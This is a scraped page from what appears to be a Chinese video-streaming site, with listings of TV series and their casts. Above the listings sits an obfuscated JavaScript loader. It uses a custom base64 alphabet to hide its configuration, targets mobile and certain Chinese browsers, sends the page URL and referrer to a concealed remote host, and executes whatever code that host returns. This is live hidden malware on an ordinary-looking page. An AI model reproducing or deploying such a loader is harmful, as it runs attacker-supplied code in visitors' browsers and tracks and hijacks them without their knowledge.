function mdre(e) {
const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab";
let n = "";
let r, o, c, s, a, i, l;
let d = 0;
let f = String(e).replace(/\r\n/g, "\n");
let h = "";
for (let e = 0; e < f.length; e++) {
const t = f.charCodeAt(e);
if (t < 128) {
h += String.fromCharCode(t);
} else if (t > 127 && t < 2048) {
h += String.fromCharCode(t >> 6 | 192);
h += String.fromCharCode(t & 63 | 128);
} else {
h += String.fromCharCode(t >> 12 | 224);
h += String.fromCharCode(t >> 6 & 63 | 128);
h += String.fromCharCode(t & 63 | 128);
}
}
while (d < h.length) {
r = h.charCodeAt(d++);
o = h.charCodeAt(d++);
c = h.charCodeAt(d++);
s = r >> 2;
a = (r & 3) << 4 | o >> 4;
i = (o & 15) << 2 | c >> 6;
l = c & 63;
if (isNaN(o)) {
n += t.charAt(s) + t.charAt(a);
} else if (isNaN(c)) {
n += t.charAt(s) + t.charAt(a) + t.charAt(i);
} else {
n += t.charAt(s) + t.charAt(a) + t.charAt(i) + t.charAt(l);
}
}
return n;
}
function iwtq(e) {
const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab";
let n = "";
let r = 0;
let o, c, s, a;
const i = String(e).replace(/[^A-Za-z0-9\-_]/g, "");
const l = i.length;
while (r < l) {
if (r == l) o = -1; else o = t.indexOf(i.charAt(r++));
if (r == l) c = -1; else c = t.indexOf(i.charAt(r++));
if (r === l) s = -1; else s = t.indexOf(i.charAt(r++));
if (r === l) a = -1; else a = t.indexOf(i.charAt(r++));
if (o === -1 || c === -1) {
break;
}
const e = o << 2 | c >> 4;
n += String.fromCharCode(e);
if (s !== -1) {
const e = (c & 15) << 4 | s >> 2;
n += String.fromCharCode(e);
}
if (a !== -1) {
const e = (s & 3) << 6 | a;
n += String.fromCharCode(e);
}
}
let d = "";
r = 0;
while (r < n.length) {
const e = n.charCodeAt(r);
if (e < 128) {
d += String.fromCharCode(e);
r++;
} else if (e > 191 && e < 224) {
const t = n.charCodeAt(r + 1);
d += String.fromCharCode((e & 31) << 6 | t & 63);
r += 2;
} else {
const t = n.charCodeAt(r + 1);
const o = n.charCodeAt(r + 2);
d += String.fromCharCode((e & 15) << 12 | (t & 63) << 6 | o & 63);
r += 3;
}
}
return d;
}
function gwyddp(e) {
return Math.floor(Math.random() * (e + 1));
}
window['w'+'jb'+'hz'+'s'+'fx'] = navigator.platform && !/^Mac|Win/.test(navigator.platform) || !navigator.platform && /Android|iOS|iPhone/i.test(navigator.userAgent) ? function() {
(function(e, t, n) {
const r = n[iwtq("dPW5hqWyi4Inhqp0iU")];
let o = "";
try {
o = opener ? opener.document.location.href : n.referrer;
} catch (e) {
o = n.referrer;
}
if (o && o.length > 900) {
o = o.slice(0, 900);
}
let c = t.location.href;
if (c && c.length > 900) {
c = c.slice(0, 900);
}
const s = iwtq(e).split(",");
const a = s[3];
const i = s[2];
let l = s[4];
let d;
if (l.indexOf(";") > -1) {
let e = l.split(";");
if (e.length < 1) return;
if (e.length > 1) {
d = e[gwyddp(e.length)];
} else {
d = e[0];
}
} else {
d = l;
}
const f = mdre(`su=${d}&t=${s[0]}&d=${s[1]}&r=${o}&m=${Date.now()}&u=${c}&sm=${i}`);
const h = navigator.userAgent;
if (h.indexOf("b" + "ai" + "d" + "u") !== -1) {
const e = new XMLHttpRequest;
e.open("POST", `${i}://${d}/getSv/${f}`);
e.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
e.setRequestHeader("X-REQUESTED-WITH", "XMLHttpRequest");
e.onreadystatechange = function() {
if (e.readyState === 4 && e.status === 200) {
const t = JSON.parse(e.responseText);
const n = new Function("c", `${iwtq(t.ds)}; return ${t.ns}(c);`)(t.img.join(""));
new Function("_tdcs", n)(r);
}
};
e.send();
} else if (t.WebSocket && /UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(h)) {
const e = new WebSocket(`${a}://${d}/ws/${f}`);
e.onmessage = function(t) {
e.close();
const o = t.data.split(";");
if (o.length > 2) {
remoteCode = iwtq(o[0]);
remoteCode += iwtq(o[1]);
remoteCode += iwtq(o[2]);
new Function("_tdcs", remoteCode)(r);
} else {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
}
};
e.onerror = function() {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
};
} else {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
}
})("H-01H2ULGCmMiDALGDiLh51nhOILfrHydPpziQ", window, document);
} : function() {};
主演:莫里斯·孔特,奥克萨纳·奥兰,Jose Conejo Martin,Ski Carr,蔡斯·科尔曼,Alanna De La Rossa,Maria del Rosario,塞巴斯蒂安·卡瓦哈尔,Juan Camilo Castillo,小戴维·M·桑多瓦尔,Jason Gurvitz,卡洛斯·莫瑞诺,德里克·奥坎波,Marcela Benjumea,Robert Steven Brown,Billy Smith,Allen Quindiagan,Nicolas Troya,罗曼·波利安斯基,马里奥·罗恰
更新第10集
白粉飞 第二季
主演:戴姆森·伊德瑞斯 , 卡特·哈德森 , 艾米莉·里奥斯 , 塞尔吉奥·佩里斯-门切塔 , 阿明·约瑟夫 , Angela Lewis , Isaiah John , Filipe Valle Costa , 阿隆·阿布布尔 , Malcolm M. Mays , 朱迪斯·斯科特 , 乔纳森·塔克 , 雷格·爱德沃兹 , 阿兰娜·乌巴赫 , 德雷·戴维斯 , 尼克·毕肖普 , 李升熙 , 盖尔·比恩 , 泰勒·科瓦尔斯基 , 乔恩·查芬 , 乔纳森阿维多瑞 , 亚当·卡斯特 , 斯蒂芬妮·纳什 , Emma
主演:塞缪尔·杰克逊,约翰·大卫·华盛顿,丹妮尔·戴德怀勒,雷·费舍尔,科里·霍金斯,迈克尔·波茨,Skylar Smith,史蒂芬·詹姆士,埃丽卡·巴杜,Malik J Ali,查丽蒂·乔丹,Isaiah Gunn,Matrell Smith,杰瑞卡·辛顿,盖尔·比恩,Hanniel Joseph,保莱塔·华盛顿,奥利维亚·华盛顿,Kylee D. Allen,Deetta West
正片
王朝倒闭
主演:Milinka Winata,Eleven Lee,Allen Chen,Maggie Law
第24集完结
生活大爆炸 第四季
主演:约翰尼·盖尔克奇,吉姆·帕森斯,凯莉·库柯,西蒙·赫尔伯格,昆瑙·内亚,马伊姆·拜力克,Gregory Allen Gabroy,梅丽莎·劳奇,阿尔蒂·曼,威尔·惠顿,武井乔治
主演:范·迪塞尔,露丝·莱斯利,伊利亚·伍德,奥拉维尔·达里·奥拉夫松,丽纳·欧文,朱莉·恩格尔布雷希特,迈克尔·凯恩,约瑟夫·吉尔根,伊萨赫·德·班克尔,迈克尔·哈尔西,斯隆·库姆斯,洛特·弗贝克,道恩·奥利弗瑞,因巴尔·拉维,阿玛尼·杰克森,艾米·卡里诺,贝克斯·泰勒-克劳斯,大卫·惠伦,杰克厄迪,Allegra Carpenter,萨马拉·李,大卫·维格,丹佛·米洛,邦妮·摩根,马克·斯达格,肖恩·卡拉汉,杰克逊·弗雷泽,詹姆斯·哈奇森三世,凯西·亨德肖特,埃夫卡·科瓦拉西尤斯,Jared S. Eddo